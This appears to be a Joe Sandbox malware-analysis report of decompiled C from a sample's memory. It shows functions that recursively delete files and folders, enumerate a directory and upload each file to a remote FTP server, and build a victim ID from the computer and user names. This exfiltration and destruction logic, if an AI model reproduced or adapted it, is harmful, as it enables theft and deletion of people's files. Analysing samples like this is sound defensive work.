                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E013070D8(WCHAR* __ecx, void* __edx) {
                                                                                                                                      				short _v524;
                                                                                                                                      				struct _WIN32_FIND_DATAW _v1116;
                                                                                                                                      				short _v1636;
                                                                                                                                      				char _v1637;
                                                                                                                                      				void* _t38;
                                                                                                                                      				int _t39;
                                                                                                                                      				int _t44;
                                                                                                                                      				char _t47;
                                                                                                                                      				int _t54;
                                                                                                                                      				void* _t72;
                                                                                                                                      				WCHAR* _t74;
                                                                                                                                      				void* _t77;
                                                                                                                                      
                                                                                                                                      				_t72 = __edx;
                                                                                                                                      				_t74 = __ecx;
                                                                                                                                      				E01312085( &_v524, __ecx);
                                                                                                                                      				E013120A7( &_v524, L"\\*");
                                                                                                                                      				E01312085( &_v1636, _t74);
                                                                                                                                      				E013120A7( &_v1636, 0x1329c08);
                                                                                                                                      				_t38 = FindFirstFileW( &_v524,  &_v1116); // executed
                                                                                                                                      				_t77 = _t38;
                                                                                                                                      				if(_t77 == 0xffffffff) {
                                                                                                                                      					L17:
                                                                                                                                      					_t39 = 0;
                                                                                                                                      					__eflags = 0;
                                                                                                                                      				} else {
                                                                                                                                      					E01312085( &_v524,  &_v1636);
                                                                                                                                      					_v1637 = 1;
                                                                                                                                      					do {
                                                                                                                                      						_t44 = FindNextFileW(_t77,  &_v1116); // executed
                                                                                                                                      						_t84 = _t44;
                                                                                                                                      						if(_t44 == 0) {
                                                                                                                                      							__eflags = GetLastError() - 0x12;
                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                      								goto L16;
                                                                                                                                      							} else {
                                                                                                                                      								_t47 = 0;
                                                                                                                                      								_v1637 = 0;
                                                                                                                                      								goto L12;
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							if(E013072AA( &(_v1116.cFileName), _t84) != 0) {
                                                                                                                                      								L11:
                                                                                                                                      								_t47 = _v1637;
                                                                                                                                      								goto L12;
                                                                                                                                      							} else {
                                                                                                                                      								E013120A7( &_v1636,  &(_v1116.cFileName));
                                                                                                                                      								if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                      									__eflags = _v1116.dwFileAttributes & 0x00000001;
                                                                                                                                      									if((_v1116.dwFileAttributes & 0x00000001) != 0) {
                                                                                                                                      										SetFileAttributesW( &_v1636, 0x80);
                                                                                                                                      									}
                                                                                                                                      									_t54 = DeleteFileW( &_v1636); // executed
                                                                                                                                      									__eflags = _t54;
                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                      										goto L16;
                                                                                                                                      									} else {
                                                                                                                                      										goto L10;
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									if(E013070D8( &_v1636, _t72) == 0) {
                                                                                                                                      										L16:
                                                                                                                                      										FindClose(_t77);
                                                                                                                                      										goto L17;
                                                                                                                                      									} else {
                                                                                                                                      										RemoveDirectoryW( &_v1636);
                                                                                                                                      										L10:
                                                                                                                                      										E01312085( &_v1636,  &_v524);
                                                                                                                                      										goto L11;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						goto L18;
                                                                                                                                      						L12:
                                                                                                                                      					} while (_t47 != 0);
                                                                                                                                      					FindClose(_t77);
                                                                                                                                      					_t39 = RemoveDirectoryW(_t74); // executed
                                                                                                                                      				}
                                                                                                                                      				L18:
                                                                                                                                      				return _t39;
                                                                                                                                      			}















                                                                                                                                      0x013070d8
                                                                                                                                      0x013070ed
                                                                                                                                      0x013070f1
                                                                                                                                      0x01307103
                                                                                                                                      0x0130710e
                                                                                                                                      0x0130711d
                                                                                                                                      0x01307135
                                                                                                                                      0x0130713b
                                                                                                                                      0x01307140
                                                                                                                                      0x01307231
                                                                                                                                      0x01307231
                                                                                                                                      0x01307231
                                                                                                                                      0x01307146
                                                                                                                                      0x01307153
                                                                                                                                      0x0130715a
                                                                                                                                      0x0130715f
                                                                                                                                      0x01307168
                                                                                                                                      0x0130716e
                                                                                                                                      0x01307170
                                                                                                                                      0x0130721d
                                                                                                                                      0x01307220
                                                                                                                                      0x00000000
                                                                                                                                      0x01307222
                                                                                                                                      0x01307222
                                                                                                                                      0x01307224
                                                                                                                                      0x00000000
                                                                                                                                      0x01307224
                                                                                                                                      0x01307176
                                                                                                                                      0x01307184
                                                                                                                                      0x013071fb
                                                                                                                                      0x013071fb
                                                                                                                                      0x00000000
                                                                                                                                      0x01307186
                                                                                                                                      0x01307193
                                                                                                                                      0x013071a2
                                                                                                                                      0x013071be
                                                                                                                                      0x013071c6
                                                                                                                                      0x013071d2
                                                                                                                                      0x013071d2
                                                                                                                                      0x013071dd
                                                                                                                                      0x013071e3
                                                                                                                                      0x013071e5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013071a4
                                                                                                                                      0x013071af
                                                                                                                                      0x0130722a
                                                                                                                                      0x0130722b
                                                                                                                                      0x00000000
                                                                                                                                      0x013071b1
                                                                                                                                      0x013071b6
                                                                                                                                      0x013071e7
                                                                                                                                      0x013071f4
                                                                                                                                      0x00000000
                                                                                                                                      0x013071fa
                                                                                                                                      0x013071af
                                                                                                                                      0x013071a2
                                                                                                                                      0x01307184
                                                                                                                                      0x00000000
                                                                                                                                      0x013071ff
                                                                                                                                      0x013071ff
                                                                                                                                      0x01307208
                                                                                                                                      0x0130720f
                                                                                                                                      0x0130720f
                                                                                                                                      0x01307233
                                                                                                                                      0x01307238

                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,0132F948), ref: 01307135
                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,?), ref: 01307168
                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 013071D2
                                                                                                                                      • DeleteFileW.KERNELBASE(?), ref: 013071DD
                                                                                                                                        • Part of subcall function 013070D8: RemoveDirectoryW.KERNEL32(?), ref: 013071B6
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 01307208
                                                                                                                                      • RemoveDirectoryW.KERNELBASE(00000000), ref: 0130720F
                                                                                                                                      • GetLastError.KERNEL32 ref: 01307217
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0130722B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2341273852-0
                                                                                                                                      • Opcode ID: 7c196586f39f88c3b716f40697726d67ab9c1d6f6344a782f7ab45eafb8e864a
                                                                                                                                      • Instruction ID: e2ae7139f1d1e5144d2633581fa2eaedef358f0f0d217c0de03788c2089366f5
                                                                                                                                      • Opcode Fuzzy Hash: 7c196586f39f88c3b716f40697726d67ab9c1d6f6344a782f7ab45eafb8e864a
                                                                                                                                      • Instruction Fuzzy Hash: A4316272508349AAD735EAA4A848EDB7BECAF99318F14091DF9C5C20C4EB35E109C766
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                      			E01304C77(WCHAR* __ecx, short __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t33;
                                                                                                                                      				void* _t34;
                                                                                                                                      				void* _t37;
                                                                                                                                      				void* _t38;
                                                                                                                                      				void* _t44;
                                                                                                                                      				void* _t45;
                                                                                                                                      				WCHAR* _t50;
                                                                                                                                      				int _t51;
                                                                                                                                      				void* _t60;
                                                                                                                                      				WCHAR* _t62;
                                                                                                                                      				short _t84;
                                                                                                                                      				WCHAR* _t91;
                                                                                                                                      				void* _t92;
                                                                                                                                      				short _t95;
                                                                                                                                      				void* _t98;
                                                                                                                                      				void* _t100;
                                                                                                                                      
                                                                                                                                      				_t103 = __eflags;
                                                                                                                                      				_t84 = __edx;
                                                                                                                                      				_t62 = __ecx;
                                                                                                                                      				E01323174(E013234DE, __edx, __eflags);
                                                                                                                                      				_t95 = _t84;
                                                                                                                                      				_t91 = _t62;
                                                                                                                                      				_t33 = E0130282E(E01304C09(_t84, _t95, _t98, __eflags, 0x2c), __eflags);
                                                                                                                                      				_t1 = _t98 - 0x70; // 0x1306ad1
                                                                                                                                      				_t34 = E013027E1(_t1, _t84, _t33);
                                                                                                                                      				 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                                                                                                                                      				_t4 = _t98 - 0x40; // 0x1306b01
                                                                                                                                      				E0130326C(_t4, "/", _t34);
                                                                                                                                      				_t5 = _t98 - 0x70; // 0x1306ad1
                                                                                                                                      				 *(_t98 - 4) = 2;
                                                                                                                                      				E01302755(_t5, "/", __eflags);
                                                                                                                                      				_t7 = _t98 - 0x40; // 0x1306b01
                                                                                                                                      				_t8 = _t98 - 0xa0; // 0x1306aa1
                                                                                                                                      				_t37 = E013031D6(_t8, _t7, __eflags);
                                                                                                                                      				 *(_t98 - 4) = 3;
                                                                                                                                      				_t10 = _t98 - 0x88; // 0x1306ab9
                                                                                                                                      				 *((intOrPtr*)(_t100 - 0x98)) = 0x132fa5c;
                                                                                                                                      				_t38 = E013033AA(_t10, _t37, _t91, __eflags, "/");
                                                                                                                                      				 *(_t98 - 4) = 4;
                                                                                                                                      				_t12 = _t98 - 0x28; // 0x1306b19
                                                                                                                                      				E013031AE(_t12, _t38, _t91, "/");
                                                                                                                                      				_t13 = _t98 - 0x88; // 0x1306ab9
                                                                                                                                      				E01302755(_t13, _t38, _t103);
                                                                                                                                      				_t14 = _t98 - 0xa0; // 0x1306aa1
                                                                                                                                      				 *(_t98 - 4) = 7;
                                                                                                                                      				E01302755(_t14, _t38, _t103);
                                                                                                                                      				_t16 = _t98 + 0x14; // 0x6583f065
                                                                                                                                      				_push( *_t16);
                                                                                                                                      				_t17 = _t98 - 0x28; // 0x1306b19
                                                                                                                                      				_t18 = _t98 - 0x58; // 0x1306ae9
                                                                                                                                      				E013031D6(_t18, _t17, _t103);
                                                                                                                                      				 *(_t98 - 4) = 8;
                                                                                                                                      				_t44 = InternetOpenW(0, 1, 0, 0, 0); // executed
                                                                                                                                      				_t20 = _t98 + 0xc; // 0x4ec
                                                                                                                                      				_t60 = _t44;
                                                                                                                                      				_t21 = _t98 + 8; // 0xec810001
                                                                                                                                      				_t45 = InternetConnectW(_t60, _t91, _t95,  *_t21,  *_t20, 1, 0x8000000, 0);
                                                                                                                                      				_t22 = _t98 - 0x40; // 0x1306b01
                                                                                                                                      				_t92 = _t45;
                                                                                                                                      				FtpCreateDirectoryW(_t92, E01302712(_t22, 0));
                                                                                                                                      				_t23 = _t98 - 0x28; // 0x1306b19
                                                                                                                                      				FtpCreateDirectoryW(_t92, E01302712(_t23, 0)); // executed
                                                                                                                                      				_t24 = _t98 - 0x58; // 0x1306ae9
                                                                                                                                      				_t50 = E01302712(_t24, 0);
                                                                                                                                      				_t25 = _t98 + 0x10; // 0x89575653
                                                                                                                                      				_t51 = FtpPutFileW(_t92,  *_t25, _t50, 2, 0); // executed
                                                                                                                                      				InternetCloseHandle(_t92); // executed
                                                                                                                                      				InternetCloseHandle(_t60);
                                                                                                                                      				_t26 = _t98 - 0x58; // 0x1306ae9
                                                                                                                                      				E01302755(_t26, _t17, 0);
                                                                                                                                      				_t27 = _t98 - 0x28; // 0x1306b19
                                                                                                                                      				E01302755(_t27, _t17, 0);
                                                                                                                                      				_t28 = _t98 - 0x40; // 0x1306b01
                                                                                                                                      				E01302755(_t28, _t17, 0);
                                                                                                                                      				_t29 = _t98 - 0xc; // 0x89645e5f
                                                                                                                                      				 *[fs:0x0] =  *_t29;
                                                                                                                                      				return _t51;
                                                                                                                                      			}





















                                                                                                                                      0x01304c77
                                                                                                                                      0x01304c77
                                                                                                                                      0x01304c77
                                                                                                                                      0x01304c7c
                                                                                                                                      0x01304c8c
                                                                                                                                      0x01304c8e
                                                                                                                                      0x01304c97
                                                                                                                                      0x01304c9d
                                                                                                                                      0x01304ca0
                                                                                                                                      0x01304ca5
                                                                                                                                      0x01304ca9
                                                                                                                                      0x01304cb4
                                                                                                                                      0x01304cba
                                                                                                                                      0x01304cbd
                                                                                                                                      0x01304cc1
                                                                                                                                      0x01304cc7
                                                                                                                                      0x01304cca
                                                                                                                                      0x01304cd0
                                                                                                                                      0x01304cd5
                                                                                                                                      0x01304cd9
                                                                                                                                      0x01304ce1
                                                                                                                                      0x01304ce8
                                                                                                                                      0x01304cf0
                                                                                                                                      0x01304cf4
                                                                                                                                      0x01304cf7
                                                                                                                                      0x01304cfe
                                                                                                                                      0x01304d04
                                                                                                                                      0x01304d09
                                                                                                                                      0x01304d0f
                                                                                                                                      0x01304d13
                                                                                                                                      0x01304d18
                                                                                                                                      0x01304d18
                                                                                                                                      0x01304d1b
                                                                                                                                      0x01304d1e
                                                                                                                                      0x01304d21
                                                                                                                                      0x01304d29
                                                                                                                                      0x01304d33
                                                                                                                                      0x01304d42
                                                                                                                                      0x01304d45
                                                                                                                                      0x01304d47
                                                                                                                                      0x01304d4d
                                                                                                                                      0x01304d53
                                                                                                                                      0x01304d56
                                                                                                                                      0x01304d5f
                                                                                                                                      0x01304d65
                                                                                                                                      0x01304d6f
                                                                                                                                      0x01304d79
                                                                                                                                      0x01304d7c
                                                                                                                                      0x01304d82
                                                                                                                                      0x01304d86
                                                                                                                                      0x01304d8f
                                                                                                                                      0x01304d96
                                                                                                                                      0x01304d9c
                                                                                                                                      0x01304d9f
                                                                                                                                      0x01304da4
                                                                                                                                      0x01304da7
                                                                                                                                      0x01304dac
                                                                                                                                      0x01304daf
                                                                                                                                      0x01304db4
                                                                                                                                      0x01304dbb
                                                                                                                                      0x01304dc4

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01304C7C
                                                                                                                                        • Part of subcall function 013031D6: __EH_prolog.LIBCMT ref: 013031DB
                                                                                                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 01304D33
                                                                                                                                      • InternetConnectW.WININET(00000000,?,?,EC810001,000004EC,00000001,08000000,00000000), ref: 01304D4D
                                                                                                                                      • FtpCreateDirectoryW.WININET(00000000,00000000), ref: 01304D5F
                                                                                                                                      • FtpCreateDirectoryW.WININET(00000000,00000000), ref: 01304D6F
                                                                                                                                      • FtpPutFileW.WININET(00000000,89575653,00000000,00000002,00000000), ref: 01304D86
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 01304D8F
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 01304D96
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Internet$CloseCreateDirectoryH_prologHandle$ConnectFileOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1543334877-0
                                                                                                                                      • Opcode ID: c7e5f369c84c41c2f028f04fe5048c458117cf22ca191850581b6188326a07cc
                                                                                                                                      • Instruction ID: 59af3bed72ccc6763a6e161fc5d0aa8b8eac7d30415de8bea2d1636878ededb6
                                                                                                                                      • Opcode Fuzzy Hash: c7e5f369c84c41c2f028f04fe5048c458117cf22ca191850581b6188326a07cc
                                                                                                                                      • Instruction Fuzzy Hash: 83313231900219AFDB16FBA8CC58BEEBBBCFF68708F504059E505A2181EF745A49DB61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                      			E01304A96(void* __ecx, short __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                      				void* _t27;
                                                                                                                                      				void* _t29;
                                                                                                                                      				int _t34;
                                                                                                                                      				void* _t36;
                                                                                                                                      				void* _t37;
                                                                                                                                      				WCHAR* _t47;
                                                                                                                                      				intOrPtr* _t53;
                                                                                                                                      				char _t55;
                                                                                                                                      				void* _t87;
                                                                                                                                      				short _t89;
                                                                                                                                      				void* _t91;
                                                                                                                                      				void* _t93;
                                                                                                                                      				void* _t94;
                                                                                                                                      
                                                                                                                                      				_t83 = __edx;
                                                                                                                                      				E01323174(E0132349E, __edx, __eflags);
                                                                                                                                      				_t94 = _t93 - 0x2a0;
                                                                                                                                      				_push(_t89);
                                                                                                                                      				_t55 = 0;
                                                                                                                                      				 *((intOrPtr*)(_t91 - 4)) = 0;
                                                                                                                                      				_t26 = E0130282E(E01304C09(_t83, _t89, _t91, __eflags, 0xe), __eflags);
                                                                                                                                      				_t97 =  *_t26;
                                                                                                                                      				if( *_t26 != 0) {
                                                                                                                                      					L2:
                                                                                                                                      					_push(L"\\*");
                                                                                                                                      					_t2 = _t91 + 8; // 0x1306b49
                                                                                                                                      					_t83 = _t2;
                                                                                                                                      					_t3 = _t91 - 0x28; // 0x1306b19
                                                                                                                                      					_t27 = E013031D6(_t3, _t2, _t98);
                                                                                                                                      					_t4 = _t91 - 0x2ac; // 0x1306895
                                                                                                                                      					_t29 = FindFirstFileW(E01302712(_t27, _t98), _t4);
                                                                                                                                      					_t5 = _t91 - 0x28; // 0x1306b19
                                                                                                                                      					_t87 = _t29;
                                                                                                                                      					E01302755(_t5, _t2, _t98);
                                                                                                                                      					if(_t87 == 0xffffffff) {
                                                                                                                                      						L9:
                                                                                                                                      						_t21 = _t91 + 8; // 0x1306b49
                                                                                                                                      						E01302755(_t21, _t83, _t100);
                                                                                                                                      						_t22 = _t91 - 0xc; // 0x89645e5f
                                                                                                                                      						 *[fs:0x0] =  *_t22;
                                                                                                                                      						return _t55;
                                                                                                                                      					} else {
                                                                                                                                      						while(1) {
                                                                                                                                      							_t20 = _t91 - 0x2ac; // 0x1306895
                                                                                                                                      							_t34 = FindNextFileW(_t87, _t20);
                                                                                                                                      							_t100 = _t34;
                                                                                                                                      							if(_t34 == 0) {
                                                                                                                                      								break;
                                                                                                                                      							}
                                                                                                                                      							__eflags =  *(_t91 - 0x2ac) & 0x00000010;
                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                      								_t9 = _t91 - 0x280; // 0x13068c1
                                                                                                                                      								__eflags = E013072AA(_t9, __eflags);
                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                      									_push(0x1329c08);
                                                                                                                                      									_t10 = _t91 + 8; // 0x1306b49
                                                                                                                                      									_t11 = _t91 - 0x58; // 0x1306ae9
                                                                                                                                      									_t36 = E013031D6(_t11, _t10, __eflags);
                                                                                                                                      									_t12 = _t91 - 0x280; // 0x13068c1
                                                                                                                                      									 *((char*)(_t91 - 4)) = 1;
                                                                                                                                      									_t85 = _t36;
                                                                                                                                      									_t14 = _t91 - 0x40; // 0x1306b01
                                                                                                                                      									_t37 = E013031AE(_t14, _t36, _t87, _t12);
                                                                                                                                      									_t15 = _t91 - 0x280; // 0x13068c1
                                                                                                                                      									 *((char*)(_t91 - 4)) = 2;
                                                                                                                                      									_push(E01302712(_t37, __eflags));
                                                                                                                                      									_push(E0130282E(E01304C09(_t36, _t89, _t91, __eflags, 0x2b), __eflags));
                                                                                                                                      									_push(E0130282E(E01304C09(_t36, _t89, _t91, __eflags, 0x2a), __eflags));
                                                                                                                                      									_t89 = E01311AD3(_t43, E0130282E(E01304C09(_t36, _t89, _t91, __eflags, 0x29), __eflags));
                                                                                                                                      									_t47 = E0130282E(E01304C09(_t85, _t89, _t91, __eflags, 0x28), __eflags);
                                                                                                                                      									_t83 = _t89;
                                                                                                                                      									E01304C77(_t47, _t89, __eflags);
                                                                                                                                      									_t94 = _t94 + 0x10;
                                                                                                                                      									_t17 = _t91 - 0x40; // 0x1306b01
                                                                                                                                      									E01302755(_t17, _t89, __eflags);
                                                                                                                                      									_t18 = _t91 - 0x58; // 0x1306ae9
                                                                                                                                      									 *((char*)(_t91 - 4)) = _t55;
                                                                                                                                      									E01302755(_t18, _t89, __eflags);
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						FindClose(_t87);
                                                                                                                                      						_t55 = 1;
                                                                                                                                      						goto L9;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t53 = E0130282E(E01304C09(_t83, _t89, _t91, _t97, 0xf), _t97);
                                                                                                                                      				_t98 =  *_t53;
                                                                                                                                      				if( *_t53 == 0) {
                                                                                                                                      					goto L9;
                                                                                                                                      				}
                                                                                                                                      				goto L2;
                                                                                                                                      			}



















                                                                                                                                      0x01304a96
                                                                                                                                      0x01304a9b
                                                                                                                                      0x01304aa0
                                                                                                                                      0x01304aa7
                                                                                                                                      0x01304aa9
                                                                                                                                      0x01304aad
                                                                                                                                      0x01304ab7
                                                                                                                                      0x01304abc
                                                                                                                                      0x01304abe
                                                                                                                                      0x01304ad6
                                                                                                                                      0x01304ad6
                                                                                                                                      0x01304adb
                                                                                                                                      0x01304adb
                                                                                                                                      0x01304ade
                                                                                                                                      0x01304ae1
                                                                                                                                      0x01304ae7
                                                                                                                                      0x01304af6
                                                                                                                                      0x01304afc
                                                                                                                                      0x01304aff
                                                                                                                                      0x01304b01
                                                                                                                                      0x01304b09
                                                                                                                                      0x01304bef
                                                                                                                                      0x01304bef
                                                                                                                                      0x01304bf2
                                                                                                                                      0x01304bf7
                                                                                                                                      0x01304bfe
                                                                                                                                      0x01304c07
                                                                                                                                      0x01304b0f
                                                                                                                                      0x01304bd0
                                                                                                                                      0x01304bd0
                                                                                                                                      0x01304bd8
                                                                                                                                      0x01304bde
                                                                                                                                      0x01304be0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01304b14
                                                                                                                                      0x01304b1b
                                                                                                                                      0x01304b21
                                                                                                                                      0x01304b2c
                                                                                                                                      0x01304b2e
                                                                                                                                      0x01304b34
                                                                                                                                      0x01304b39
                                                                                                                                      0x01304b3c
                                                                                                                                      0x01304b3f
                                                                                                                                      0x01304b45
                                                                                                                                      0x01304b4b
                                                                                                                                      0x01304b50
                                                                                                                                      0x01304b52
                                                                                                                                      0x01304b55
                                                                                                                                      0x01304b5b
                                                                                                                                      0x01304b61
                                                                                                                                      0x01304b6d
                                                                                                                                      0x01304b7c
                                                                                                                                      0x01304b8b
                                                                                                                                      0x01304ba3
                                                                                                                                      0x01304bac
                                                                                                                                      0x01304bb1
                                                                                                                                      0x01304bb5
                                                                                                                                      0x01304bba
                                                                                                                                      0x01304bbd
                                                                                                                                      0x01304bc0
                                                                                                                                      0x01304bc5
                                                                                                                                      0x01304bc8
                                                                                                                                      0x01304bcb
                                                                                                                                      0x01304bcb
                                                                                                                                      0x01304b2e
                                                                                                                                      0x01304b1b
                                                                                                                                      0x01304be7
                                                                                                                                      0x01304bed
                                                                                                                                      0x00000000
                                                                                                                                      0x01304bed
                                                                                                                                      0x01304b09
                                                                                                                                      0x01304ac9
                                                                                                                                      0x01304ace
                                                                                                                                      0x01304ad0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01304A9B
                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,01306895,0000000E,0132FABC,00000000,00000000), ref: 01304AF6
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,01306895), ref: 01304BD8
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 01304BE7
                                                                                                                                        • Part of subcall function 013031D6: __EH_prolog.LIBCMT ref: 013031DB
                                                                                                                                        • Part of subcall function 01304C77: __EH_prolog.LIBCMT ref: 01304C7C
                                                                                                                                        • Part of subcall function 01304C77: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 01304D33
                                                                                                                                        • Part of subcall function 01304C77: InternetConnectW.WININET(00000000,?,?,EC810001,000004EC,00000001,08000000,00000000), ref: 01304D4D
                                                                                                                                        • Part of subcall function 01304C77: FtpCreateDirectoryW.WININET(00000000,00000000), ref: 01304D5F
                                                                                                                                        • Part of subcall function 01304C77: FtpCreateDirectoryW.WININET(00000000,00000000), ref: 01304D6F
                                                                                                                                        • Part of subcall function 01304C77: FtpPutFileW.WININET(00000000,89575653,00000000,00000002,00000000), ref: 01304D86
                                                                                                                                        • Part of subcall function 01304C77: InternetCloseHandle.WININET(00000000), ref: 01304D8F
                                                                                                                                        • Part of subcall function 01304C77: InternetCloseHandle.WININET(00000000), ref: 01304D96
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Internet$CloseFileFindH_prolog$CreateDirectoryHandle$ConnectFirstNextOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3622609271-0
                                                                                                                                      • Opcode ID: f3a3072b117aa44eb09a83f7b1a579626b6853c5e6da7e394e9d17f9148515b0
                                                                                                                                      • Instruction ID: 0d713b4b61b1041b9c9fd17aa34f22ee06f34d9d1ff0ce69a3b56c3b93fc7627
                                                                                                                                      • Opcode Fuzzy Hash: f3a3072b117aa44eb09a83f7b1a579626b6853c5e6da7e394e9d17f9148515b0
                                                                                                                                      • Instruction Fuzzy Hash: 5931A034A00219AEDF1BF7B8D878BAE7BE8AF6561CF104459E501A71C1FE745B488750
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                      			E01307C21(long __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                      				void* _t25;
                                                                                                                                      				void* _t26;
                                                                                                                                      				long _t31;
                                                                                                                                      				void* _t45;
                                                                                                                                      				long _t46;
                                                                                                                                      				void* _t48;
                                                                                                                                      
                                                                                                                                      				_t41 = __edx;
                                                                                                                                      				_t31 = __ecx;
                                                                                                                                      				E01323174(E013238B5, __edx, __eflags);
                                                                                                                                      				_t46 = _t31;
                                                                                                                                      				 *(_t48 - 0x14) = _t46;
                                                                                                                                      				 *((intOrPtr*)(_t48 - 0x18)) = 0x10;
                                                                                                                                      				__imp__GetComputerNameExW(1, _t48 - 0x68, _t48 - 0x18, _t45); // executed
                                                                                                                                      				 *(_t48 - 0x14) = 0x100;
                                                                                                                                      				GetUserNameW(_t48 - 0x26c, _t48 - 0x14); // executed
                                                                                                                                      				_t25 = E013027E1(_t48 - 0x48, _t41, "-");
                                                                                                                                      				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
                                                                                                                                      				_t26 = E0130326C(_t48 - 0x30, _t48 - 0x68, _t25);
                                                                                                                                      				 *(_t48 - 4) = 1;
                                                                                                                                      				E013031AE(_t46, _t26, __edi, _t48 - 0x26c);
                                                                                                                                      				E01302755(_t48 - 0x30, _t26,  *(_t48 - 4));
                                                                                                                                      				E01302755(_t48 - 0x48, _t26,  *(_t48 - 4));
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
                                                                                                                                      				return _t46;
                                                                                                                                      			}









                                                                                                                                      0x01307c21
                                                                                                                                      0x01307c21
                                                                                                                                      0x01307c26
                                                                                                                                      0x01307c35
                                                                                                                                      0x01307c3b
                                                                                                                                      0x01307c41
                                                                                                                                      0x01307c48
                                                                                                                                      0x01307c51
                                                                                                                                      0x01307c60
                                                                                                                                      0x01307c6e
                                                                                                                                      0x01307c73
                                                                                                                                      0x01307c7e
                                                                                                                                      0x01307c89
                                                                                                                                      0x01307c92
                                                                                                                                      0x01307c9c
                                                                                                                                      0x01307ca4
                                                                                                                                      0x01307cae
                                                                                                                                      0x01307cb7

